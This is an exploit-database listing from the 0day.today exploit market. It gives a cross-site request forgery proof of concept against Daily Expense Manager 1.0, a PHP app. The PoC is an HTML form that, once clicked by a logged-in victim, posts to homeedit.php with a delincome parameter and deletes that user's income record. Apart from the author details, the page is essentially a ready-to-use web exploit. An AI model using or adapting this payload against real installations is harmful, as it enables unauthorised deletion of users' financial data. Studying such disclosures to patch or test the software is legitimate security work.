[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income) Vulnerability

Author
Mr Winst0n
Risk
[
Security Risk Low
]
0day-ID
0day-ID-33092
Category
web applications
Date add
09-08-2019
Platform
php
# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan@gmail.com
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
# Tested Version: 1.0
# Tested on: Parrot OS


# PoC:

<html>
<body>
	<form action="http://server/homeedit.php?delincome=778" method="post">
		<input type="submit" value="Click!" />
	</form>
</body>
</html>

#  0day.today [2024-11-16]  #